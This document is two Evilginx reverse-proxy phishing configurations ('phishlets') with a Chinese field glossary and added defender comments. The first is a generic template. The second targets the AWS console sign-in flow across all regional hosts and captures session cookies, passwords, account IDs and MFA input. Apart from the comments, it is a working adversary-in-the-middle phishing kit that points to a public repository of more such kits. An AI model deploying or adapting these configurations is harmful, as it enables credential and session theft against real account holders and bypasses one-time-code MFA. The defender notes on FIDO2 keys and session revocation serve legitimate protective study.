# Example Evilginx phishlet template: the configuration for a reverse-proxy
# (adversary-in-the-middle) phishing page. The comments below are written for
# defenders and show which artefacts such a proxy rewrites and captures.
# NOTE(review): nesting indentation was lost in this listing; lines are kept
# exactly as published.
name: '您的第一个钓鱼页面'
author: 'Simpler Hacking'
# Minimum Evilginx version the template declares compatibility with.
min_ver: '3.2.0'
# Hosts relayed by the proxy. '{domain}' is a template placeholder; this entry
# is marked both as session-bearing and as the landing host.
proxy_hosts:
- { phish_sub: 'www', orig_sub: 'www', domain: '{domain}', session: true, is_landing: true }
# Content rewriting: '{domain}' is replaced by '{hostname}' in bodies of the
# listed MIME types. Defender note: the page content therefore looks genuine,
# and only the hostname in the address bar differs from the real site.
sub_filters:
- { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['text/html', 'application/javascript', 'text/css', 'application/json', 'image/x-icon', 'text/plain', 'application/xml', 'image/*', 'font/*']}
- { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['application/x-www-form-urlencoded']}
# Cookies captured from the relayed session (here one named 'session').
# Defender note: a captured session cookie can be replayed without the password
# or a one-time code, so OTP-based MFA does not stop this class of proxy.
# Origin-bound authenticators (FIDO2/WebAuthn) and session revocation after a
# suspected compromise are the relevant controls.
auth_tokens:
- domain: '{domain}'
keys: ['session']
# Form fields read from POST bodies; '(.*)' matches the whole submitted value.
creds:
- key: '用户名'
search: ['(.*)']
type: 'post'
- key: '密码'
search: ['(.*)']
type: 'post'
# URL pattern and status that the tool treats as a completed login. The page's
# own glossary says the listed auth_tokens are taken at that point.
auth_urls:
- url_regex: 'https://{hostname}/login'
valid_statuses: [200]
# Login-form field identifiers and the URL of the real login page.
login:
username: 用户
password: 密码
url: https://www.{domain}/login
# This is an example phishlet for version 3.2.0
# Phishlets can be found at: https://github.com/simplerhacking/Evilginx3-Phishlets
钓鱼页面参数说明
name: 定义钓鱼页面的名称。
author: 填写钓鱼页面的作者。
min_ver: 指定兼容该钓鱼页面的最小 Evilginx 版本。
proxy_hosts: 表示需要代理的域名和子域。phish_sub 是被模仿的钓鱼页面的子域。
sub_filters: 让钓鱼页面替换实际域名实例为钓鱼域名,这对钓鱼页面正常工作至关重要。
auth_tokens: 标识应从受害者浏览器捕获的 Cookie,以便获取访问受害者的会话权限。
creds: 此字段确定设计用来窃取的凭证。key 是凭证的名称(如用户名或密码),search 是正则表达式,程序会使用它来识别并从用户输入中提取这些详细信息。
auth_urls: 规定了 Evilginx 将视为已认证 URL 的网址。在受害者登录后,如果检测到重定向到这些 URL 之一,那么将窃取列出的 auth_tokens。
login: 在这里指定目标网页登录表单中的用户名和密码字段标识符,以及受害者输入凭据的页面链接。
force_post: 若设置为真,则强制将 HTTP 方法从 GET 更改为 POST。
is_landing: 如果设置为真,表示该页面是钓鱼攻击的着陆页。
js_inject: 可以在这里编写一些 JavaScript 代码注入网页中,通常用于增强钓鱼攻击,确保受害者体验顺畅。
domain: 用作模板变量,替换钓鱼配置中使用的目标主机名。
Evilginx3 模板
钓鱼页面仓库:https://github.com/simplerhacking/Evilginx3-Phishlets
# Phishlet template labelled 'Amazon'. Its host list covers the AWS console
# sign-in flow. The comments below are written for defenders and show what a
# reverse-proxy phishing page relays and captures.
# NOTE(review): nesting indentation was lost in this listing; lines are kept
# exactly as published.
name: 'Amazon'
min_ver: '3.0.0'
# Optional 'accountid' parameter; it is interpolated as '{accountid}' into the
# login path at the end of this file.
params:
- {name: 'accountid', default: '', required: false}
# Genuine AWS hostnames that the proxy mirrors under its own domain.
# Defender note: these labels appear as a prefix of a different registrable
# domain, so URL checks and user guidance should compare the registrable
# domain rather than the familiar subdomain text.
proxy_hosts:
- {phish_sub: 'signin.aws', orig_sub: 'signin.aws', domain: 'amazon.com', session: true, is_landing: true, auto_filter: true}
- {phish_sub: 'aws', orig_sub: 'aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: '', orig_sub: '', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'phd.aws', orig_sub: 'phd.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'console.aws', orig_sub: 'console.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'a.b.cdn.console', orig_sub: 'a.b.cdn.console', domain: 'awsstatic.com', session: true, is_landing: false, auto_filter: true}
# subdomains updated (based on configuration)
# The regional console hosts below are listed with session: false.
- {phish_sub: 'us-east-1.console.aws', orig_sub: 'us-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'us-east-2.console.aws', orig_sub: 'us-east-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'us-west-1.console.aws', orig_sub: 'us-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'us-west-2.console.aws', orig_sub: 'us-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'af-south-1.console.aws', orig_sub: 'af-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-east-1.console.aws', orig_sub: 'ap-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-south-1.console.aws', orig_sub: 'ap-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-northeast-3.console.aws', orig_sub: 'ap-northeast-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-northeast-2.console.aws', orig_sub: 'ap-northeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-southeast-1.console.aws', orig_sub: 'ap-southeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-southeast-2.console.aws', orig_sub: 'ap-southeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-northeast-1.console.aws', orig_sub: 'ap-northeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ca-central-1.console.aws', orig_sub: 'ca-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-central-1.console.aws', orig_sub: 'eu-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-west-1.console.aws', orig_sub: 'eu-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-west-2.console.aws', orig_sub: 'eu-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-south-1.console.aws', orig_sub: 'eu-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-west-3.console.aws', orig_sub: 'eu-west-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-north-1.console.aws', orig_sub: 'eu-north-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'me-south-1.console.aws', orig_sub: 'me-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'sa-east-1.console.aws', orig_sub: 'sa-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
# Cookie names captured per cookie domain.
# NOTE(review): '.*,regexp' looks like a catch-all pattern covering every
# cookie on the domain; confirm against the tool's documentation.
# Defender note: these are session-bearing cookies, so a password reset alone
# does not evict a replayed session. Incident response should revoke active
# sessions, and sign-ins arrive from the proxy's address, so console logins
# from unfamiliar source IPs (CloudTrail ConsoleLogin events) are a detection
# signal.
auth_tokens:
- domain: '.amazon.com'
keys: ['aws-ubid-main', 'aws-signer-token_ap-southeast-2', 'noflush_awsccs_sid', 'aws-userInfo', 'aws-userInfo-signed', 'aws-account-alias', '.*,regexp']
- domain: '.aws.amazon.com'
keys: ['awsccc', 'aws-vid', 'aws-account-data', '.*,regexp']
- domain: '.console.aws.amazon.com'
keys: ['noflush_Region', 'noflush_awscnm', 'awsc-rac', 'aws-creds', 'aws-consoleInfo', 'aws-creds-code-verifier', 'seance', '.*,regexp']
- domain: '.signin.aws.amazon.com'
keys: ['aws-creds', 'aws-userInfo-keyBase', 'aws-mfa-entered', 'JSESSIONID', 'aws-signin-csrf', '.*,regexp']
- domain: 'phd.aws.amazon.com'
keys: ['aws-creds', 'aws-creds-code-verifier', 'aws-consoleInfo', 'seance', '.*,regexp']
# POST fields read from the relayed sign-in form: 'username' and 'password',
# plus the custom fields 'account' and 'mfaType'. '(.*)' matches the whole
# submitted value.
# Defender note: MFA input passes through the proxy like any other form field;
# origin-bound authenticators (FIDO2/WebAuthn security keys) are the MFA type
# that does not complete on a look-alike hostname.
credentials:
username:
key: 'username'
search: '(.*)'
type: 'post'
password:
key: 'password'
search: '(.*)'
type: 'post'
custom:
- key: 'account'
search: '(.*)'
type: 'post'
- key: 'mfaType'
search: '(.*)'
type: 'post'
# Path the tool treats as evidence that sign-in completed.
auth_urls:
- '/console/home'
# Host and path of the genuine sign-in page served as the landing page.
# '{accountid}' is filled from the params entry above.
login:
domain: 'signin.aws.amazon.com'
path: '/oauth?redirect_uri=https://console.aws.amazon.com/console/home?hashArgs=%23&isauthcode=true&client_id=arn:aws:signin:::console/canvas&response_type=code&iam_user=true{accountid}&forceMobileApp=0&code_challenge=hzU4QD5OTEZeurPpybAoADh8GnO_URqBECTzHN4CxkY&code_challenge=&code_challenge_method=SHA-256'